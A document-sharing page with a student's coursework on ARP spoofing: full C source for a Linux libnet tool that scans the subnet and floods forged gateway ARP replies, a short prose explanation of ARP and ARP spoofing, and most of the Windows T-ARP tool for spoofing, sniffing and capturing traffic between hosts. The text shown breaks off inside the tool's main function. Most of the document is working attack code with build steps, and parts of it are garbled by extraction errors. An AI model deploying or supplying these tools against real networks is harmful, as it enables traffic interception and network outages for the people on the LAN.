下载文档原格式
ARP欺骗攻击程序1.#include<stdio.h>2.#include<stdlib.h>3.#include<arpa/inet.h>4.#include<string.h>5.#include<linux/if_ether.h>6.#include<list.h>7.#include<libnet.h>8.#include<linux/netlink.h>9.#include<linux/rtnetlink.h>10.#include<sys/socket.h>11.#include<errno.h>12.#include<sys/time.h>13.#include<sys/ioctl.h>14.#include<getopt.h>15.#include<pthread.h>16.#include<net/if.h>17.#include<netinet/ether.h>18.#include<netpacket/packet.h>19.20.#ifdef DEBUG21.#define DEBUGP(format,args...)fprintf(stdout,format, ##args)22.#else23.#define DEBUGP(format,args...)24.#endif25.26.27.static struct option opts[]= {28.{.name="interface",.has_arg = 1,.val ='i'},29.{.name="help",.has_arg = 0,.val ='h'},30.{NULL}31.};32.33.typedef struct _send_info {34.char dev[6];35.u_int8_t smac[ETH_ALEN];36.u_int8_t dmac[ETH_ALEN];37.u_int32_t sip;38.u_int32_t dip;39.}send_info;40.41.struct arppacket {42.u_int16_t ar_hrd; /*硬件类型*/43.u_int16_t ar_pro; /*协议类型*/44.u_int8_t ar_hln; /*硬件地址长度*/45.u_int8_t ar_pln; /*协议地址长度*/46.u_int16_t ar_op; /*ARP操作码*/47.u_int8_t ar_sha[ETH_ALEN]; /*发送方MAC地址*/48.u_int32_t ar_sip; /*发送方IP地址*/49.u_int8_t ar_tha[ETH_ALEN]; /*目的MAC地址*/50.u_int32_t ar_tip; /*目的IP地址*/51.}__attribute__ ((packed));52.53.typedef struct mac_ip{54.struct list_head list;55.u_char mac_addr[6];56.u_int32_t ip_addr;57.}mac_ip_t;58.59.static void print_help(void) {60.printf("-h Print this help\n");61.printf("-i Ethernet name\n");62.exit(-1);63.}64.65.static int pthread_num;66.static pthread_t *pid;67.static struct list_head listhead;68.pthread_mutex_t mut;69.libnet_t *l;70.71.static int get_local_mac_ip_mask (const char *device, u_int8_t* mac,72.u_int32_t *ip, u_int32_t *mask) {73.int sockfd;74.struct ifreq req;75.struct sockaddr_in *sin;76.77.memset(&req, 0,sizeof(req));78.strcpy(req.ifr_name, device);79.req.ifr_addr.sa_family = PF_INET;80.81.if((sockfd = socket(PF_INET, SOCK_DGRAM, 0))< 0) {82.fprintf(stderr,"Sock Error:%s\n", strerror(errno));83.return -1;84.}85.86./*获取指定网卡的MAC地址*/87.if(ioctl(sockfd, SIOCGIFHWADDR,(char *)&req)< 0) {88.fprintf(stderr,"ioctl SIOCGIFHWADDR:%s\n", strerror(errno));89.close(sockfd);90.return -2;91.} else {92.memcpy(mac, req.ifr_hwaddr.sa_data, ETH_ALEN);93.}94.95./*获取指定网卡的IP地址*/96.if(ioctl(sockfd, SIOCGIFADDR,(char *)&req)< 0) {97.fprintf(stderr,"ioctl SIOCGIFADDR:%s\n", strerror(errno));98.close (sockfd);99.return -3;100.} else {101.sin =(struct sockaddr_in *)&req.ifr_addr;102.memcpy(ip,(char *)&sin->sin_addr, 4);103.}104.105./*获取指定网卡的子网掩码*/106.if(ioctl(sockfd, SIOCGIFNETMASK,(char *)&req)< 0) { 107.fprintf(stderr,"ioctl SIOCGIFADDR:%s\n", strerror(errno));108.close(sockfd);109.return -4;110.} else {111.sin =(struct sockaddr_in *)&req.ifr_addr;112.memcpy(mask,(char *)&sin->sin_addr, 4);113.}115.return 0;116.}117.118.static u_int8_t *print_mac(const u_int8_t *mac) { 119.static char buffer[6];120.memset (buffer, 0,sizeof(buffer));121.sprintf (buffer,"%02x:%02x:%02x:%02x:%02x:%02x", 122.mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]); 123.return buffer;124.}125.126.static char *print_ip(const u_int32_t ip) {127.return inet_ntoa(*(struct in_addr *)&ip);128.}129.130.static int get_gw(u_int32_t *gw) {131.char s[255]= {0};132.char ss[9]= {0};133.FILE *fp;134.if((fp = fopen("/proc/net/route","r"))== NULL) { 135.printf("/proc/net/route open failure!\n");136.return -1;137.}138.fgets(s, 255, fp);139.fgets(s, 255, fp);140.sscanf(s,"%*s%*s%s",ss);141.sscanf(ss,"%x", gw);142.return 0;143.}145.static void set_subnet_broadcast(u_int32_t localip, u_int32_t mask,146.u_int32_t *subnet, u_int32_t *broadcast) {147./*计算子网地址和广播地址148.子网地址=主机地址和掩码的与运算149.广播地址=子网地址和掩码的同或运算150.由于C语言没有同或运算符,同或=异或取反*/151.*subnet = localip & mask;152.*broadcast = ~(*subnet ^ mask);153.}154.155.static send_info **slot_create(u_int32_t subnet, u_int32_t broadcast, char *cap_dev,156.u_int8_t *localmac, u_int32_t localip) {157.send_info **send_inf;158.int idx;159.u_int8_t tmpmac[]= {0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF};160.161.subnet = ntohl(subnet);162.broadcast = ntohl(broadcast);163.pthread_num = broadcast - subnet - 1;164.pid =(pthread_t *)malloc(sizeof(pthread_t)* pthread_num);165./*166.避免多线程访问统一结构体所造成不可预料的结果167.所以这里给n个线程动态分配n个结构体的内存空间168.用一个数组统一保存这些内存地址,最后统一释放169.*/170.send_inf = malloc(sizeof(send_info *)* pthread_num);171.if(!send_inf) return NULL;172.173.for(idx=0; idx<pthread_num; idx++) {174.send_inf[idx]=(send_info *)malloc(sizeof(send_info));175.if(!send_inf[idx]) return NULL;176.memset(send_inf[idx], 0,sizeof(send_info));177.strncpy(send_inf[idx]->dev, cap_dev, strlen(cap_dev));178.memcpy(send_inf[idx]->smac, localmac, ETH_ALEN);179.memcpy(send_inf[idx]->dmac, tmpmac, ETH_ALEN);180.send_inf[idx]->sip = localip;181.}182.183.return send_inf;184.}185.186.static void fill_ethhdr(const char *packet,const send_info *info) {187.struct ethhdr *p_ethhdr;188.189./*使p_ethhdr指向以太网帧的帧头*/190.p_ethhdr =(struct ethhdr *)packet;191./*复制目的以太网地址*/192.memcpy(p_ethhdr->h_dest, info->dmac, ETH_ALEN);193./*复制源以太网地址*/194.memcpy(p_ethhdr->h_source, info->smac, ETH_ALEN);195./*设置协议类型,以太网0x0806*/196.p_ethhdr->h_proto = htons(ETH_P_ARP);197.198.}199.200.static void fill_arphdr(const char *packet,const send_info *info) {201.struct arppacket *p_arp;202.u_int8_t t_mac[6]= {0x0, 0x0, 0x0, 0x0, 0x0, 0x0};203.204.p_arp =(struct arppacket *)(packet + ETH_HLEN); /*定位ARP包地址*/205.p_arp->ar_hrd =htons(0x0001); /*arp硬件类型,1表示以太网地址*/206.p_arp->ar_pro = htons(ETH_P_IP); /*协议类型 0x0800表示IP地址*/207.p_arp->ar_hln =ETH_ALEN; /*硬件地址长度即MAC地址长度为6字节*/208.p_arp->ar_pln = ETH_FCS_LEN;/*IP地址长度即为4字节*/209.p_arp->ar_op =htons(0x0001); /*操作方式1为ARP 请求*/210./*发送方MAC地址*/211.memcpy(p_arp->ar_sha, info->smac, ETH_ALEN);212./*发送方IP地址*/213.p_arp->ar_sip = info->sip;214./*接收方MAC地址ARP请求以太网首部中目的地址为全FF, ARP首部中目标MAC为全00*/215.memcpy(p_arp->ar_tha, t_mac, ETH_ALEN);216./*接收方IP地址*/217.p_arp->ar_tip = info->dip;218.}219.220.static int get_iface_index(int fd,const char* interface_name) {221.struct ifreq ifr;222.memset(&ifr, 0,sizeof(ifr));223.strcpy(ifr.ifr_name, interface_name);224.if(ioctl(fd, SIOCGIFINDEX, &ifr)==-1)225.return -1;226.return ifr.ifr_ifindex;227.}228.229.static int send_arp_request(int fd,const char *packet, int length,230.struct sockaddr *addr,int len) {231.if(sendto(fd, packet,length, 0,addr, len)< 0)232.return -1;233.return 0;234.}235.236.static int add_mac_ip(const char *mac, const u_int32_t ip) {237.struct mac_ip *h;238.h =(struct mac_ip *)malloc(sizeof(mac_ip_t));239.if(!h) return -1;240.INIT_LIST_HEAD(&h->list);241.memcpy(h->mac_addr, mac, 6);242.h->ip_addr =ip;243.pthread_mutex_lock(&mut);244.list_add_tail(&h->list, &listhead);245.pthread_mutex_unlock(&mut);246.return 0;247.}248.249.static void *send_rev(const send_info *info) {250.char packet[42]; /*以太帧缓冲区 14+28 */251.int fd, n, i;252.u_int8_t buffer[128];253.struct sockaddr_ll addr;254.int len =sizeof(addr);255.int optval =1 ;256.struct ethhdr *p_ethhdr;257.struct arppacket *p_arp;258.259.memset(packet, 0,sizeof(packet));260.memset(buffer, 0,sizeof(buffer));261.memset(&addr, 0,sizeof(addr));262.263.fill_ethhdr(packet, info);264.265.fill_arphdr(packet, info);266.267.#if 0268.p_arp =(struct arppacket *)(packet + ETH_HLEN); /*定位ARP包地址*/269.printf("Dst_IP: %s\n",inet_ntoa(*(struct in_addr *)&p_arp->ar_tip));270.#endif271.272.if((fd =socket(PF_PACKET,SOCK_RAW, htons(ETH_P_ARP)))< 0) {273.printf("socket init failure\n");274.exit(1);275.}277./*允许发送广播数据包*/278.if(setsockopt(fd,SOL_SOCKET,SO_BROADCAST, &optval,sizeof(optval))==-1) {279.printf("Could not setsocketopt on raw socket\n");280.close(fd);281.exit(2);282.}283.284.#if 1285./*设置非阻塞模式*/286.int flags;287.flags = fcntl(fd, F_GETFL, 0); /*先获取fd的状态*/288.fcntl(fd, F_SETFL, flags|O_NONBLOCK);289.#endif290.291.addr.sll_family = AF_PACKET;292.if((addr.sll_ifindex = get_iface_index(fd, info->dev))< 0) 293.return;294.addr.sll_protocol = htons(ETH_P_ARP);295.296./*发送3次arp请求包*/297.for(i=0; i<3; i++) {298.send_arp_request(fd,packet,sizeof(packet),(struct sockaddr *)&addr, len);299.}300.301.p_ethhdr =(struct ethhdr *)buffer;302.p_arp =(struct arppacket *)(buffer + ETH_HLEN);303.305.SOCK_RAW模式是会包含以太头部,所以会接收所有的数据包306.每个线程都会收到最多pthread_num个应答包,所以这里需要307.手动判断所收到的应答包是否是对应这个线程发出的308.*/309.for(i=0; i<pthread_num; i++) {310.n = recvfrom(fd, buffer,sizeof(buffer), 0, NULL, NULL);311.if(n > 0) {312.if(info->dip == p_arp->ar_sip) {313.DEBUGP("Receive IP:%-15s MAC:%s ETH_PROTO:0x%04x\n", print_ip(p_arp->ar_sip),314.print_mac(p_arp->ar_sha), ntohs(p_ethhdr->h_proto));315.add_mac_ip(p_arp->ar_sha, p_arp->ar_sip);316.break;317.}318.}leep(1000);320.}321.close(fd);322.323.pthread_exit(NULL);324.}325.326.static void thread_create(send_info**inf,u_int32_t subnet,327.u_int32_t broadcast) {328.u_int32_t addr,ret;329.int idx = 0;331.subnet = ntohl(subnet);332.broadcast = ntohl(broadcast);333.for(addr=subnet+1;addr<broadcast;addr++) {334.inf[idx]->dip = htonl(addr);335.ret= pthread_create(&pid[idx], NULL,(void *)send_rev, inf[idx++]);336.if(ret!= 0) printf("create the thread failure\n");337.}338./*等待线程结束*/339.for(idx=0; idx<pthread_num; idx++) {340.pthread_join(pid[idx], NULL);341.}342.}343.344.static void print_list(void) {345.mac_ip_t *h;346.mac_ip_t test;347.list_for_each_entry(h, &listhead, list) {348.test.ip_addr = h->ip_addr;349.memcpy(test.mac_addr, h->mac_addr, 6);350.printf("Target_IP: %-15s Target_MAC: %s\n", print_ip(test.ip_addr),351.print_mac(test.mac_addr));352.}353.}354.355.static void free_mem(send_info **pNode) {356.int i;357.for(i=0; i<pthread_num; i++) {358.free(pNode[i]);359.}360.free(pid);361.}362.363.static int send_arp_reply(const char *dev,const u_int32_t gateway,364.const mac_ip_t *target) {365.char device[6]= {0};366.u_int32_t dst_ip, src_ip;367.u_int8_t src_mac[6]={0x12,0x34,0x56,0x78,0x99, 0x99}; /*虚假的源MAC */368.u_int8_t dst_mac[6]= {0}; /*干扰的目标MAC */369.char error[LIBNET_ERRBUF_SIZE]; /*出错信息*/370.libnet_ptag_t arp_tag, eth_tag;371.372.strncpy(device, dev,sizeof(device)-1);373.374./*网络序的网关*/375.src_ip = gateway;376./*干扰的网络序目标IP */377.dst_ip = target->ip_addr;378./*干扰的目标MAC */379.memcpy(dst_mac, target->mac_addr, 6);380.381.if((l = libnet_init(LIBNET_LINK_ADV, device, error))== NULL) {382.printf("libnet_init: error [%s]\n", error);383.return -2;384.};385.386./*构造arp协议块*/387.arp_tag = libnet_build_arp(388.ARPHRD_ETHER, /*硬件类型,1表示以太网硬件地址*/389.ETHERTYPE_IP, /* 0x0800表示询问IP地址*/390.6, /*硬件地址长度*/391.4, /* IP地址长度*/392.ARPOP_REPLY, /*操作方式:ARP请求*/393.src_mac, /* source MAC addr*/394.(u_int8_t *)&src_ip, /* src proto addr*/395.dst_mac, /* dst MAC addr*/396.(u_int8_t *)&dst_ip, /* dst IP addr*/397.NULL, /* no payload */398.0, /* payload length*/399.l, /* libnet tag */400.0 /* Create new one */);401.if(arp_tag ==-1) {402.printf("build IP failure\n");403.return -3;404.}405.406./*构造一个以太网协议块407.You should only use this function when408.libnet is initialized with the LIBNET_LINK interface.*/409.eth_tag = libnet_build_ethernet(410.dst_mac, /*以太网目的地址*/411.src_mac, /*以太网源地址*/412.ETHERTYPE_ARP, /*以太网上层协议类型,此时为ARP请求*/413.NULL, /*负载,这里为空*/414.0, /*负载大小*/415.l, /* Libnet句柄*/416.0 /*协议块标记,0表示构造一个新的*/417.);418.if(eth_tag ==-1) {419.printf("build eth_header failure\n");420.return -4;421.}422.423.libnet_write(l);424.425.return 0;426.}427.428.static void arp_attack(const char *dev, const u_int32_t gateway) {429.mac_ip_t *s;430.printf("\nStarting attack...\nPress Ctrl^C to abort!\n");431.while(1) {432.list_for_each_entry(s, &listhead, list) {433.if(send_arp_reply(dev, gateway, s)== 0)434.libnet_destroy(l);435.}leep(500000);437.}438.}439.440.static void clean_list(void)441.{442.mac_ip_t *h,*htmp;443.if(list_empty(&listhead)) return;444.list_for_each_entry_safe(h, htmp, &listhead, list) {445.list_del(&h->list);446.free(h);447.}448.}449.450.int main(int argc, char **argv) {451.char c;452.char *cap_dev = NULL;453.u_int8_t localmac[ETH_ALEN];454.u_int32_t localip,mask, gateway, subnet, broadcast;455.send_info **send_slot;456.opterr = 0;457.458.while((c = getopt_long(argc, argv,"hi:", opts, NULL))!= -1) {459.switch(c) {460.case '?':461.fprintf(stderr,"Bad Options\n");462.exit(-1);463.case 'h':464.print_help();465.break;466.case 'i':467.cap_dev = optarg;468.break;469.}470.}471.472.if(!cap_dev) print_help();473.474./*获取本机的IP地址 MAC地址子网掩码*/475.if(get_local_mac_ip_mask(cap_dev, localmac,476.&localip, &mask)!= 0) {477.printf("Get local mac and ip failure!\n");478.exit(-2);479.}480.481./*设置网络号和广播地址*/482.set_subnet_broadcast(localip,mask,&subnet, &broadcast);483.484./*获取主机网关地址*/485.if(get_gw(&gateway)!= 0) {486.printf("Get gateway failure\n");487.exit(-3);488.}489.490.DEBUGP("Capturing from %s\n", cap_dev);491.DEBUGP("IP=%s\n", print_ip(localip));492.DEBUGP("Mask=%s\n", print_ip(mask));493.DEBUGP("MAC=%s\n", print_mac(localmac));494.DEBUGP("GW=%s\n", print_ip(gateway));495.DEBUGP("Subnet=%s\n", print_ip(subnet));496.DEBUGP("Broadcast=%s\n", print_ip(broadcast));497.498./*为每个线程分配访问的空间和槽位*/499.if((send_slot = slot_create(subnet, broadcast, cap_dev, 500.localmac, localip))== NULL) {501.printf("slot create error\n");502.exit(-4);503.}504.505./*初始化链表*/506.INIT_LIST_HEAD(&listhead);507.508./*创建多线程*/509.thread_create(send_slot, subnet, broadcast); 510.511./*调试打印list成员信息*/512.print_list();513.514./*释放多线程结构体*/515.free_mem(send_slot);516.517.#if 0518./*开始攻击*/519.arp_attack(cap_dev, gateway);520.#endif521.522.clean_list();523.524.return 0;525.}list.rar(头文件解压后放置/usr/local/include/目录下)如果没有安装libnet库的话, 运行apt-get install libnet-dev。
信息安全原理——ARP攻击班级:07计算机1班姓名:胡益铭学号:E07620112ARP原理:ARP,即地址解析协议,实现通过IP地址得知其物理地址。
在TCP/IP网络环境下,每个主机都分配了一个32位的IP地址,这种互联网地址是在网际范围标识主机的一种逻辑地址。
为了让报文在物理网路上传送,必须知道对方目的主机的物理地址。
这样就存在把IP 地址变换成物理地址的地址转换问题。
以以太网环境为例,为了正确地向目的主机传送报文,必须把目的主机的32位IP地址转换成为48位以太网的地址。
这就需要在互连层有一组服务将IP地址转换为相应物理地址,这组协议就是ARP协议。
ARP数据报格式如下:什么是ARP欺骗:其实,此起彼伏的瞬间掉线或大面积的断网大都是ARP欺骗在作怪。
ARP欺骗攻击已经成了破坏网吧经营的罪魁祸首,是网吧老板和网管员的心腹大患。
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是——截获网关数据。
它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。
第二种ARP欺骗的原理是——伪造网关。
它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。
在PC看来,就是上不了网了,“网络掉线了”。
本程序基于C语言,利用winpacp实现往局域网内发自定义的包,以达到ARP欺骗的目的。
首先从/archive/下载4.0beta1-WpdPack和4.0beta1-WinPcap.exe,版本很多,不过最新版本需要64位的系统,本人32位系统用不了。
直接点击4.0beta1-WinPcap.exe安装,然后在C:\Program Files\WinPcap下打开rpcapd.exe 服务。
T-ARP欺骗源程序代码C#include "packet32.h"#include "ntddndis.h"#include <stdio.h>#include <conio.h>#pragma comment(lib,"ws2_32") #pragma comment(lib,"packet")#define ETH_IP 0x0800#define ETH_ARP 0x0806 #define ARP_REQUEST 0x0001 #define ARP_REPLY 0x0002 #define ARP_HARDW ARE 0x0001 #define max_num_adapter 10#pragma pack(push,1)typedef struct ethdr{unsigned char eh_dst[6];unsigned char eh_src[6];unsigned short eh_type;}ETHDR,*PETHDR;typedef struct arphdr{unsigned short arp_hdr;unsigned short arp_pro;unsigned char arp_hln;unsigned char arp_pln;unsigned short arp_opt;unsigned char arp_sha[6];unsigned long arp_spa;unsigned char arp_tha[6];unsigned long arp_tpa;}ARPHDR,*PARPHDR;typedef struct iphdr{unsigned char h_lenver;unsigned char tos;unsigned short total_len;unsigned short ident;unsigned short frag_and_flags;unsigned char ttl;unsigned char proto;unsigned short checksum;unsigned int sourceip;unsigned int destip;}IPHDR,*PIPHDR;#pragma pack(push)LPADAPTER lpadapter=0;LPPACKET lppacketr,lppackets;ULONG myip,firstip,secondip;UCHAR mmac[6]={0},fmac[6]={0},smac[6]={0}; BOOL mm=FALSE,fm=FALSE,sm=FALSE; FILE *fp;char adapterlist[max_num_adapter][1024];char msg[50];int num=0;void start(){printf("T-ARP --- ARP Tools, by TOo2y(ò1é?), 11-9-2002\n");printf("Homepage: \n");printf("E-mail: TOo2y@\n");return ;}void usage(){printf("\nUsage: T-ARP [-m|-a|-s|-r] firstip secondip \n\n");printf("Option:\n");printf(" -m mac Get the mac address from firstip to secondip\n");printf(" -a antisniff Get the sniffing host from firstip to secondip\n");printf(" -s spoof 1> Spoof the host between firstip and secondip\n");printf(" sniff 2> Sniff if firstip == secondip == your own ip\n");printf(" shock 3> Shock if firstip == secondip != your own ip\n");printf(" -r reset Reset the spoofed host worknormally\n\n");printf("Attention:\n");printf(" 1> You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n");printf(" 2> HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\T cpip\\Parameters\\IPEnableRouter==0x1\n\n");return ;}int getmine(){char sendbuf[1024];int k;ETHDR eth;ARPHDR arp;for(k=0;k<6;k++){eth.eh_dst[k]=0xff;eth.eh_src[k]=0x82;arp.arp_sha[k]=0x82;arp.arp_tha[k]=0x00;}eth.eh_type=htons(ETH_ARP);arp.arp_hdr=htons(ARP_HARDW ARE);arp.arp_pro=htons(ETH_IP);arp.arp_hln=6;arp.arp_pln=4;arp.arp_opt=htons(ARP_REQUEST);arp.arp_tpa=htonl(myip);arp.arp_spa=inet_addr("112.112.112.112");memset(sendbuf,0,sizeof(sendbuf));memcpy(sendbuf,ð,sizeof(eth));memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE){printf("PacketSendPacket in getmine Error: %d\n",GetLastError());return -1;}return 0;}void getdata(LPPACKET lp,int op){ULONG ulbytesreceived,off,tlen,ulen,ulLines;ULONG j,k;ETHDR *eth;ARPHDR *arp;PIPHDR ip;char *buf,*pChar,*pLine,*base;struct bpf_hdr *hdr;struct sockaddr_in sin;ulbytesreceived=lp->ulBytesReceived;buf=(char *)lp->Buffer;off=0;while(off<ulbytesreceived){if(kbhit()){return ;}hdr=(struct bpf_hdr *)(buf+off);off+=hdr->bh_hdrlen;pChar=(char *)(buf+off);base=pChar;off=Packet_WORDALIGN(off+hdr->bh_caplen);eth=(PETHDR)pChar;arp=(PARPHDR)(pChar+sizeof(ETHDR));if(eth->eh_type==htons(ETH_IP)){ip=(PIPHDR)(pChar+sizeof(ETHDR));if(fm && sm && (op==3)){if((((ip->sourceip!=htonl(myip)) && (ip->destip!=htonl(myip))&& !strcmp((char*)eth->eh_dst,(char *)mmac))&& ((ip->sourceip==htonl(firstip)) || (ip->destip==htonl(firstip))|| (ip->sourceip==htonl(secondip)) || (ip->destip==htonl(secondip))))|| ((firstip==myip) && (secondip==myip))){memset(msg,0,sizeof(msg));sin.sin_addr.s_addr=ip->sourceip;printf("[IP:]%16s ---> [IP:]",inet_ntoa(sin.sin_addr));strcpy(msg,inet_ntoa(sin.sin_addr));strcat(msg+15," ---> ");sin.sin_addr.s_addr=ip->destip;printf("%16s\n",inet_ntoa(sin.sin_addr));strcat(msg+23,inet_ntoa(sin.sin_addr));fseek(fp,-2,1);fwrite("\r\n\r\n\r\n",6,1,fp);fwrite(msg,38,1,fp);fwrite("\r\n",2,1,fp);ulLines=(hdr->bh_caplen+15)/16;for(k=0;k<ulLines;k++){pLine=pChar;printf("%08lx : ",pChar-base);ulen=tlen;ulen=(ulen>16) ? 16 : ulen;tlen-=ulen;for(j=0;j<ulen;j++)printf("%02x ",*(BYTE *)pChar++);if(ulen<16)printf("%*s",(16-ulen)*3," ");pChar=pLine;for(j=0;j<ulen;j++,pChar++){printf("%c",isprint(*pChar)? *pChar : '.');fputc(isprint(*pChar) ? *pChar : '.',fp);}printf("\n");}printf("\n");fwrite("\r\n",2,1,fp);}}continue;}else if((eth->eh_type==htons(ETH_ARP)) && (arp->arp_opt==htons(ARP_REPLY))){sin.sin_addr.s_addr=arp->arp_spa;if(sin.sin_addr.s_addr==htonl(myip))memcpy(mmac,eth->eh_src,6);if(!mm){printf("\t");for(k=0;k<5;k++)printf("%.2x-",eth->eh_src[k]);printf("%.2x\n",eth->eh_src[5]);switch(op){case 1:printf("\n[MAC LIST:]");break;case 2:printf("\n[Sniffing Host:]");break;default:break;}}mm=TRUE;if((op==1) || (op==2)){printf("\n[IP:] %.16s [MAC:] ",inet_ntoa(sin.sin_addr));for(k=0;k<5;k++)printf("%.2x-",eth->eh_src[k]);printf("%.2x",eth->eh_src[5]);}else if(((op==3) || (op==4)) && (!fm || !sm)){if(arp->arp_spa==htonl(firstip)){memcpy(fmac,eth->eh_src,6);fm=TRUE;}if(arp->arp_spa==htonl(secondip)){memcpy(smac,eth->eh_src,6);sm=TRUE;}}}}return ;}DWORD WINAPI sniff(LPVOID no){int option=*(int *)no;char recvbuf[1024*250];if(PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOU S)==FALSE){printf("Warning: Unable to set the adapter to promiscuous mode\n");}if(PacketSetBuff(lpadapter,500*1024)==FALSE){printf("PacketSetBuff Error: %d\n",GetLastError());return -1;}if(PacketSetReadTimeout(lpadapter,1)==FALSE){printf("Warning: Unable to set the timeout\n");}if((lppacketr=PacketAllocatePacket())==FALSE){printf("PacketAllocatePacket receive Error: %d\n",GetLastError());return -1;}PacketInitPacket(lppacketr,(char *)recvbuf,sizeof(recvbuf));while(!kbhit()){if(PacketReceivePacket(lpadapter,lppacketr,TRUE)==FALSE){if(GetLastError()==6)return 0;printf("PacketReceivePacket Error: %d\n",GetLastError());return -1;}getdata(lppacketr,option);}return 0;}DWORD WINAPI sendMASR(LPVOID no){int fun=*(int *)no;int k,stimes;char sendbuf[1024];ETHDR eth;ARPHDR arp;if(fun<1 || fun>4){return -1;}else{for(k=0;k<6;k++){eth.eh_dst[k]=0xff;arp.arp_tha[k]=0x00;}if(fun==2)eth.eh_dst[5]=0xfe;}memcpy(eth.eh_src,mmac,6);eth.eh_type=htons(ETH_ARP);arp.arp_hdr=htons(ARP_HARDW ARE); arp.arp_pro=htons(ETH_IP);arp.arp_hln=6;arp.arp_pln=4;arp.arp_opt=htons(ARP_REQUEST); arp.arp_spa=htonl(myip);memcpy(arp.arp_sha,mmac,6);if(fun==1 || fun==2)stimes=1;else if(fun==3 || fun==4)stimes=2;for(k=0;k<stimes;k++){if(stimes==1){arp.arp_tpa=htonl(firstip+(num++));}else if(stimes==2){switch(k){case 0:arp.arp_tpa=htonl(firstip);break;case 1:arp.arp_tpa=htonl(secondip);break;default:break;}}memset(sendbuf,0,sizeof(sendbuf));memcpy(sendbuf,ð,sizeof(eth));memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE){printf("PacketSendPacket in sendMASR Error: %d\n",GetLastError());return -1;}}return 0;}DWORD WINAPI sendSR(LPVOID no){int fun=*(int *)no;int j,k;char sendbuf[1024];struct sockaddr_in fsin,ssin;BOOL stimes=FALSE;ETHDR eth;ARPHDR arp;fsin.sin_addr.s_addr=htonl(firstip); ssin.sin_addr.s_addr=htonl(secondip);eth.eh_type=htons(ETH_ARP);arp.arp_hdr=htons(ARP_HARDW ARE); arp.arp_pro=htons(ETH_IP);arp.arp_hln=6;arp.arp_pln=4;arp.arp_opt=htons(ARP_REPLY);if(fun==3){if(mm){if((firstip==myip) && (secondip==myip)){fm=TRUE;sm=TRUE;memcpy(fmac,mmac,6);memcpy(smac,mmac,6);}else if(!fm || !sm){printf("\nNot get enough data\n");return -1;}for(j=0;j<2;j++){if(j==0){printf("\nSpoofing %.16s : ",inet_ntoa(fsin.sin_addr));printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));}else if(j==1){printf("Spoofing %.16s : ",inet_ntoa(ssin.sin_addr));printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));}for(k=0;k<5;k++)printf("%.2x-",mmac[k]);printf("%.2x\n",mmac[5]);}printf("\ni will try to snoof ...\n\n");stimes=TRUE;}else{printf("\nNot get enough data\n");return -1;}}else if(fun==4){if(mm){if((firstip==myip) && (secondip==myip)){fm=TRUE;sm=TRUE;memcpy(fmac,mmac,6);memcpy(smac,mmac,6);}else if(!fm || !sm){printf("\nNot get enough data\n");return -1;}printf("\nReset %.16s : ",inet_ntoa(fsin.sin_addr));printf("%.16s ==> ",inet_ntoa(ssin.sin_addr));for(k=0;k<5;k++)printf("%.2x-",smac[k]);printf("%.2x\n",smac[5]);printf("Reset %.16s : ",inet_ntoa(ssin.sin_addr));printf("%.16s ==> ",inet_ntoa(fsin.sin_addr));for(k=0;k<5;k++)printf("%.2x-",fmac[k]);printf("%.2x\n\n",fmac[5]);stimes=FALSE;}else{printf("\nNot get enough data\n");return -1;}}elsereturn -1;do{memcpy(eth.eh_dst,fmac,6);memcpy(arp.arp_tha,fmac,6);arp.arp_tpa=htonl(firstip);arp.arp_spa=htonl(secondip);if(!stimes){memcpy(eth.eh_src,smac,6);memcpy(arp.arp_sha,smac,6);}else{memcpy(eth.eh_src,mmac,6);memcpy(arp.arp_sha,mmac,6);}memset(sendbuf,0,sizeof(sendbuf));memcpy(sendbuf,ð,sizeof(eth));memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp)); PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));if(PacketSetNumWrites(lpadapter,2)==FALSE){printf("Warning: Unable to send a packet 2 times\n");}if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE){printf("PacketSendPacket in SendSR Error: %d\n",GetLastError());return -1;}Sleep(1000);memcpy(eth.eh_dst,smac,6);memcpy(arp.arp_tha,smac,6);arp.arp_tpa=htonl(secondip);arp.arp_spa=htonl(firstip);if(!stimes){memcpy(eth.eh_src,fmac,6);memcpy(arp.arp_sha,fmac,6);}else{memcpy(eth.eh_src,mmac,6);memcpy(arp.arp_sha,mmac,6);}memset(sendbuf,0,sizeof(sendbuf));memcpy(sendbuf,ð,sizeof(eth));memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE){printf("PacketSendPacket int sendSR Error: %d\n",GetLastError());return -1;}Sleep(1000);}while(stimes);if(fun==4)printf("Reset Successfully");return 0;}int main(int argc,char *argv[]){HANDLE sthread,rthread;WCHAR adaptername[8192];WCHAR *name1,*name2;ULONG adapterlength;DWORD threadsid,threadrid;struct NetType ntype;struct bpf_stat stat;struct sockaddr_in sin;struct npf_if_addr ipbuff;int adapternum=0,opti=0,open,i,total;long npflen;system("cls.exe");start();if(argc!=4){usage();getche();return -1;}else{if(!strcmp(argv[1],"-m")){opti=1;}else if(!strcmp(argv[1],"-a")){opti=2;}else if(!strcmp(argv[1],"-s")){opti=3;if((fp=fopen("capture.txt","w+"))==NULL) {printf("Open capture.txt Error: %d\n");return -1;}else{fwrite("T-ARP Captrue Data",20,1,fp);}}else if(!strcmp(argv[1],"-r")){opti=4;}else{usage();getche();return 